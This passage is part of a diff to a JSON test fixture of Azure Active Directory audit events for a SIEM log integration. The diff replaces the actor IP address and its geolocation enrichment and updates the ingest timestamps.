principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125311600Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.8071361Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622707\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"256e3859-87ca-4b23-b2c0-45a26ccd7925\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -17229,25 +15735,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -17261,7 +15749,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -17397,7 +15885,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -17409,12 +15897,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036537100Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.8821342Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622751\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"411fc666-cabf-4cb0-b8a3-e5a2cc515b79\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125318200Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.8821342Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622751\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"411fc666-cabf-4cb0-b8a3-e5a2cc515b79\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -17440,25 +15928,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -17472,7 +15942,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -17608,7 +16078,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -17620,12 +16090,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036542800Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.9571526Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622781\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"a4a12952-3467-4d48-9950-48b4b9ac87b3\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewVal